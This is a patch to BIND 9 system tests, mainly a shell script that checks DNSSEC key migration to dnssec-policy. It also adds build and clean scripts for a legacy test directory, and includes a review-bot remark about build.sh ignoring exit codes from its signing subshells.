+ +# +# Testing good migration. +# +set_zone "migrate.kasp" +set_policy "migrate" "2" "7200" +set_server "ns3" "10.53.0.3" + +# Key properties, timings and metadata should be the same as legacy keys above. +# However, because the zsk has a lifetime, kasp will set the retired time. +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" +set_keylifetime "KEY1" "${Lksk}" +set_keylifetime "KEY2" "${Lzsk}" + +# Various signing policy checks. 
+check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +rollover_predecessor_keytimes 0 + +# - Key now has lifetime of 60 days (5184000 seconds). +# The key is removed after Iret = TTLsig + Dprp + Dsgn + retire-safety. +# TTLsig: 1d (86400 seconds) +# Dprp: 5m (300 seconds) +# Dsgn: 9d (777600 seconds) +# retire-safety: 1h (3600 seconds) +# IretZSK: 10d65m (867900 seconds) +active=$(key_get KEY2 ACTIVE) +set_addkeytime "KEY2" "RETIRED" "${active}" "${Lzsk}" +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)" +ret=0 +[ $_migrate_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migrate_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing a good migration (CSK). +# +set_zone "csk.kasp" +set_policy "default" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "no" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The key was immediately published and activated. 
+_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same key ($n)" +ret=0 +[ $_migrate_csk = $(key_get KEY1 ID) ] || log_error "mismatch csk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing a good migration (CSK, no SEP). +# +set_zone "csk-nosep.kasp" +set_policy "default" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "no" +set_keyrole "KEY1" "csk" +key_set "KEY1" "FLAGS" "256" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The key was immediately published and activated. +_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. 
+n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same key ($n)" +ret=0 +[ $_migrate_csk_nosep = $(key_get KEY1 ID) ] || log_error "mismatch csk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Test migration to dnssec-policy, existing keys do not match key algorithm. +# +set_zone "migrate-nomatch-algnum.kasp" +set_policy "migrate-nomatch-algnum" "4" "300" +set_server "ns3" "10.53.0.3" +# The legacy keys need to be retired, but otherwise stay present until the +# new keys are omnipresent, and can be used to construct a chain of trust. +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "hidden" "omnipresent" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" + +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "5184000" +set_keyalgorithm "KEY4" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" + +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - KSK must be retired since it no longer matches the policy. +# P : now-3900s +# P sync: now-3h +# A : now-3900s +# - The key is removed after the retire interval: +# IretKSK = TTLds + DprpP + retire_safety. 
+# TTLds: 2h (7200 seconds) +# Dprp: 1h (3600 seconds) +# retire-safety: 1h (3600 seconds) +# IretKSK: 4h (14400 seconds) +IretKSK=14400 +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +# P: now-3900s +# A: now-12h +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 9d (777600 seconds) +# retire-safety: 1h (3600 seconds) +# IretZSK: 9d13h (824400 seconds) +IretZSK=824400 +Lzsk=5184000 +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +keyfile=$(key_get KEY2 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.zsk +retired=$(awk '{print $3}' < retired.test${n}.zsk) +set_keytime "KEY2" "RETIRED" "${retired}" +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new KSK is immediately published and activated. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +set_keytime "KEY3" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 13h (46800 seconds) +Ipub=46800 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${Ipub}" +# - The ZSK is immediately published and activated. 
+created=$(key_get KEY4 CREATED) +set_keytime "KEY4" "PUBLISHED" "${created}" +set_keytime "KEY4" "ACTIVE" "${created}" +active=$(key_get KEY4 ACTIVE) +set_addkeytime "KEY4" "RETIRED" "${active}" "${Lzsk}" +retired=$(key_get KEY4 RETIRED) +set_addkeytime "KEY4" "REMOVED" "${retired}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy keeps existing keys ($n)" +ret=0 +[ $_migratenomatch_algnum_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migratenomatch_algnum_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Test migration to dnssec-policy, existing keys do not match key length. +# +set_zone "migrate-nomatch-alglen.kasp" +set_policy "migrate-nomatch-alglen" "4" "300" +set_server "ns3" "10.53.0.3" + +# The legacy keys need to be retired, but otherwise stay present until the +# new keys are omnipresent, and can be used to construct a chain of trust. +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "hidden" "omnipresent" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" + +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "8" "RSASHA256" "3072" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "5184000" +set_keyalgorithm "KEY4" "8" "RSASHA256" "3072" +set_keysigning "KEY4" "no" +# This key is considered to be prepublished, so it is not yet signing. 
+set_zonesigning "KEY4" "no" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" + +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - KSK must be retired since it no longer matches the policy. +# P : now-3900s +# P sync: now-3h +# A : now-3900s +# - The key is removed after the retire interval: +# IretKSK = TTLds + DprpP + retire_safety. +# TTLds: 2h (7200 seconds) +# Dprp: 1h (3600 seconds) +# retire-safety: 1h (3600 seconds) +# IretKSK: 4h (14400 seconds) +IretKSK=14400 +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +# P: now-3900s +# A: now-12h +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety. 
+# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 9d (777600 seconds) +# publish-safety: 1h (3600 seconds) +# IretZSK: 9d13h (824400 seconds) +IretZSK=824400 +Lzsk=5184000 +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +keyfile=$(key_get KEY2 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.zsk +retired=$(awk '{print $3}' < retired.test${n}.zsk) +set_keytime "KEY2" "RETIRED" "${retired}" +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new KSK is immediately published and activated. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +set_keytime "KEY3" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 13h (46800 seconds) +Ipub=46800 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${Ipub}" +# - The ZSK is immediately published and activated. +created=$(key_get KEY4 CREATED) +set_keytime "KEY4" "PUBLISHED" "${created}" +set_keytime "KEY4" "ACTIVE" "${created}" +active=$(key_get KEY4 ACTIVE) +set_addkeytime "KEY4" "RETIRED" "${active}" "${Lzsk}" +retired=$(key_get KEY4 RETIRED) +set_addkeytime "KEY4" "REMOVED" "${retired}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy keeps existing keys ($n)" +ret=0 +[ $_migratenomatch_alglen_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migratenomatch_alglen_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +######################################################## +# Testing key states derived from key timing metadata. 
# +######################################################## + +# Policy parameters. +# KSK has lifetime of 60 days (5184000 seconds). +# The KSK is removed after Iret = DprpP + TTLds + retire-safety = +# 4h = 14400 seconds. +Lksk=5184000 +IretKSK=14400 +# ZSK has lifetime of 60 days (5184000 seconds). +# The ZSK is removed after Iret = TTLsig + Dprp + Dsgn + retire-safety = +# 181h = 651600 seconds. +Lzsk=5184000 +IretZSK=651600 + +# +# Testing rumoured state. +# +set_zone "rumoured.kasp" +set_policy "timing-metadata" "2" "300" +set_server "ns3" "10.53.0.3" + +# Key properties, timings and metadata should be the same as legacy keys above. +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" +set_keylifetime "KEY1" "${Lksk}" +set_keylifetime "KEY2" "${Lzsk}" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# +# Tds="now-2h" (7200) +# Tkey="now-300s" (300) +# Tsig="now-11h" (39600) +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -300 +set_addkeytime "KEY1" "ACTIVE" "${created}" -300 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -7200 +set_retired_removed "KEY1" "${Lksk}" "${IretKSK}" +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -300 +set_addkeytime "KEY2" "ACTIVE" "${created}" -39600 +set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. 
+n=$((n+1))
+echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)"
+ret=0
+[ $_rumoured_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag"
+[ $_rumoured_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# Testing omnipresent state.
+#
+set_zone "omnipresent.kasp"
+set_policy "timing-metadata" "2" "300"
+set_server "ns3" "10.53.0.3"
+
+# Key properties, timings and metadata should be the same as legacy keys above.
+init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS"
+init_migration_states "omnipresent" "omnipresent"
+key_set "KEY1" "LEGACY" "no"
+key_set "KEY2" "LEGACY" "no"
+set_keylifetime "KEY1" "${Lksk}"
+set_keylifetime "KEY2" "${Lzsk}"
+
+# Various signing policy checks.
+check_keys
+wait_for_done_signing
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+#
+# Tds="now-3h" (10800)
+# Tkey="now-3900s" (3900)
+# Tsig="now-12h" (43200)
+created=$(key_get KEY1 CREATED)
+set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900
+set_addkeytime "KEY1" "ACTIVE" "${created}" -3900
+set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800
+set_retired_removed "KEY1" "${Lksk}" "${IretKSK}"
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900
+set_addkeytime "KEY2" "ACTIVE" "${created}" -43200
+set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Check key tags, should be the same.
+n=$((n+1))
+echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)"
+ret=0
+[ $_omnipresent_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag"
+[ $_omnipresent_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+
+######################################
+# Testing good migration with views. #
+######################################
+init_view_migration() {
+ key_clear "KEY1"
+ key_set "KEY1" "LEGACY" "yes"
+ set_keyrole "KEY1" "ksk"
+ set_keylifetime "KEY1" "0"
+ set_keysigning "KEY1" "yes"
+ set_zonesigning "KEY1" "no"
+
+ key_clear "KEY2"
+ key_set "KEY2" "LEGACY" "yes"
+ set_keyrole "KEY2" "zsk"
+ set_keylifetime "KEY2" "0"
+ set_keysigning "KEY2" "no"
+ set_zonesigning "KEY2" "yes"
+
+ key_clear "KEY3"
+ key_clear "KEY4"
+
+ set_keystate "KEY1" "GOAL" "omnipresent"
+ set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+ set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+ set_keystate "KEY1" "STATE_DS" "rumoured"
+
+ set_keystate "KEY2" "GOAL" "omnipresent"
+ set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+ set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+}
+
+set_keytimes_view_migration() {
+ # Key is six months in use.
+ created=$(key_get KEY1 CREATED)
+ set_addkeytime "KEY1" "PUBLISHED" "${created}" -16070400
+ set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -16070400
+ set_addkeytime "KEY1" "ACTIVE" "${created}" -16070400
+ created=$(key_get KEY2 CREATED)
+ set_addkeytime "KEY2" "PUBLISHED" "${created}" -16070400
+ set_addkeytime "KEY2" "ACTIVE" "${created}" -16070400
+}
+
+# Zone view.rsasha256.kasp (external)
+set_zone "view-rsasha256.kasp"
+set_policy "rsasha256" "2" "300"
+set_server "ns4" "10.53.0.4"
+init_view_migration
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keyalgorithm "KEY2" "8" "RSASHA256" "2048"
+TSIG="$DEFAULT_HMAC:external:$VIEW1"
+wait_for_nsec
+# Make sure the zone is signed with legacy keys.
+check_keys
+set_keytimes_view_migration
+check_keytimes
+dnssec_verify
+
+n=$((n+1))
+# check subdomain
+echo_i "check TXT $ZONE (view ext) rrset is signed correctly ($n)"
+ret=0
+dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed"
+grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response"
+grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*external" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response"
+check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Remember legacy key tags.
+_migrate_ext8_ksk=$(key_get KEY1 ID)
+_migrate_ext8_zsk=$(key_get KEY2 ID)
+
+# Zone view.rsasha256.kasp (internal)
+set_zone "view-rsasha256.kasp"
+set_policy "rsasha256" "2" "300"
+set_server "ns4" "10.53.0.4"
+init_view_migration
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keyalgorithm "KEY2" "8" "RSASHA256" "2048"
+TSIG="$DEFAULT_HMAC:internal:$VIEW2"
+wait_for_nsec
+# Make sure the zone is signed with legacy keys.
+check_keys
+set_keytimes_view_migration
+check_keytimes
+dnssec_verify
+
+n=$((n+1))
+# check subdomain
+echo_i "check TXT $ZONE (view int) rrset is signed correctly ($n)"
+ret=0
+dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed"
+grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response"
+grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*internal" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response"
+check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Remember legacy key tags.
+_migrate_int8_ksk=$(key_get KEY1 ID)
+_migrate_int8_zsk=$(key_get KEY2 ID)
+
+# Reconfig dnssec-policy.
+echo_i "reconfig to switch to dnssec-policy"
+copy_setports ns4/named2.conf.in ns4/named.conf
+rndc_reconfig ns4 10.53.0.4
+
+# Calculate time passed to correctly check for next key events.
+now="$(TZ=UTC date +%s)"
+time_passed=$((now-start_time))
+echo_i "${time_passed} seconds passed between start of tests and reconfig"
+
+#
+# Testing migration (RSASHA256, views).
+#
+set_zone "view-rsasha256.kasp"
+set_policy "rsasha256" "3" "300"
+set_server "ns4" "10.53.0.4"
+init_migration_keys "8" "RSASHA256" "2048" "2048"
+init_migration_states "omnipresent" "rumoured"
+# Key properties, timings and metadata should be the same as legacy keys above.
+# However, because the keys have a lifetime, kasp will set the retired time.
+key_set "KEY1" "LEGACY" "no"
+set_keylifetime "KEY1" "31536000"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+key_set "KEY2" "LEGACY" "no"
+set_keylifetime "KEY2" "8035200"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+# The ZSK needs to be replaced.
+set_keystate "KEY2" "GOAL" "hidden"
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keyrole "KEY3" "zsk"
+set_keylifetime "KEY3" "8035200"
+set_keyalgorithm "KEY3" "8" "RSASHA256" "2048"
+set_keysigning "KEY3" "no"
+set_zonesigning "KEY3" "no" # not yet
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_ZRRSIG" "hidden"
+
+# Various signing policy checks (external).
+TSIG="$DEFAULT_HMAC:external:$VIEW1"
+check_keys
+wait_for_done_signing
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "ext"
+set_keytimes_view_migration
+
+# Set expected key times:
+published=$(key_get KEY1 PUBLISHED)
+set_keytime "KEY1" "ACTIVE" "${published}"
+set_keytime "KEY1" "SYNCPUBLISH" "${published}"
+# Lifetime: 1 year (8035200 seconds)
+active=$(key_get KEY1 ACTIVE)
+set_addkeytime "KEY1" "RETIRED" "${active}" "31536000"
+# Retire interval:
+# DS TTL: 1d
+# Parent zone propagation: 3h
+# Retire safety: 1h
+# Total: 100800 seconds
+retired=$(key_get KEY1 RETIRED)
+set_addkeytime "KEY1" "REMOVED" "${retired}" "100800"
+
+published=$(key_get KEY2 PUBLISHED)
+set_keytime "KEY2" "ACTIVE" "${published}"
+# Lifetime: 3 months (8035200 seconds)
+active=$(key_get KEY2 ACTIVE)
+set_addkeytime "KEY2" "RETIRED" "${active}" "8035200"
+# Retire interval:
+# Sign delay: 9d (14-5)
+# Max zone TTL: 1d
+# Retire safety: 1h
+# Zone propagation delay: 300s
+# Total: 867900 seconds
+retired=$(key_get KEY2 RETIRED)
+set_addkeytime "KEY2" "REMOVED" "${retired}" "867900"
+
+created=$(key_get KEY3 CREATED)
+set_keytime "KEY3" "PUBLISHED" "${created}"
+# Publication interval:
+# DNSKEY TTL: 300s
+# Publish safety: 1h
+# Zone propagation delay: 300s
+# Total: 4200 seconds
+set_addkeytime "KEY3" "ACTIVE" "${created}" "4200"
+# Lifetime: 3 months (8035200 seconds)
+active=$(key_get KEY3 ACTIVE)
+set_addkeytime "KEY3" "RETIRED" "${active}" "8035200"
+# Retire interval:
+# Sign delay: 9d (14-5)
+# Max zone TTL: 1d
+# Retire safety: 1h
+# Zone propagation delay: 300s
+# Total: 867900 seconds
+retired=$(key_get KEY3 RETIRED)
+set_addkeytime "KEY3" "REMOVED" "${retired}" "867900"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+dnssec_verify
+
+# Various signing policy checks (internal).
+TSIG="$DEFAULT_HMAC:internal:$VIEW2"
+check_keys
+wait_for_done_signing
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "int"
+set_keytimes_view_migration
+check_keytimes
+check_apex
+dnssec_verify
+
+# Check key tags, should be the same.
+n=$((n+1))
+echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)"
+ret=0
+[ $_migrate_ext8_ksk = $_migrate_int8_ksk ] || log_error "mismatch ksk tag"
+[ $_migrate_ext8_zsk = $_migrate_int8_zsk ] || log_error "mismatch zsk tag"
+[ $_migrate_ext8_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag"
+[ $_migrate_ext8_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/legacy/build.sh b/bin/tests/system/legacy/build.sh
new file mode 100644
index 0000000..5aeeb9c
--- /dev/null
+++ b/bin/tests/system/legacy/build.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+(cd ns6 && $SHELL -e sign.sh)
+(cd ns7 && $SHELL -e sign.sh)
+
+$SHELL clean.sh
diff --git a/bin/tests/system/legacy/clean.sh b/bin/tests/system/legacy/clean.sh
new file mode 100644
index 0000000..4c65a2d
--- /dev/null
+++ b/bin/tests/system/legacy/clean.sh
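Review bot: A failure in either `sign.sh` run is not propagated by legacy/build.sh: the exit codes of the two subshells are ignored and the script's status is that of the final `$SHELL clean.sh`, so a broken signing step can leave missing or stale signed zones and trust anchors while the script still reports success (unless conf.sh, which is not shown here, turns on `set -e`). I would make the failure explicit, for example `(cd ns6 && $SHELL -e sign.sh) || exit 1` and the same for ns7. A one-line comment saying why clean.sh runs both before and after signing would also help the next reader.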
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.*
+rm -f ns*/named.conf
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns*/named.lock
+
+# build.sh
+rm -f ns1/named_dump.db*
+rm -f ns6/K*
+rm -f ns6/dsset-*
+rm -f ns6/edns512.db
+rm -f ns6/signer.err
+rm -f ns7/K*
+rm -f ns7/dsset-*
+rm -f ns7/edns512-notcp.db
+rm -f ns7/signer.err
+rm -f ns7/trusted.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/legacy/ns1/named1.conf.in b/bin/tests/system/legacy/ns1/named1.conf.in
new file mode 100644
index 0000000..7f8e897
--- /dev/null
+++ b/bin/tests/system/legacy/ns1/named1.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
